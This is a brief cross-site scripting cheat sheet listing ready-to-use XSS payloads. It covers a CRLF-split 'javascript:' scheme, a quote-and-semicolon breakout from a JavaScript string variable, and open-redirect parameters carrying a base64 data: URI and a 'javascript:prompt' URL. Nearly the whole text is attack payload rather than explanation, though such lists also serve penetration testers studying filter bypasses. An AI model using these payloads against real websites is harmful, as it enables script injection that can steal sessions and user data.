XSS TIPS
- 使用
CRLF
: (CR
:\r
,0x0d
;LF
:\n
,0x0a
)java%0d%0ascript%0d%0a:alert(0)
- XSS from Open URL - If it’s in a JS variable
";alert(0);//
- XSS from data:// wrapper
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
- XSS from javascript:// wrapper
http://www.example.com/redirect.php?url=javascript:prompt(1)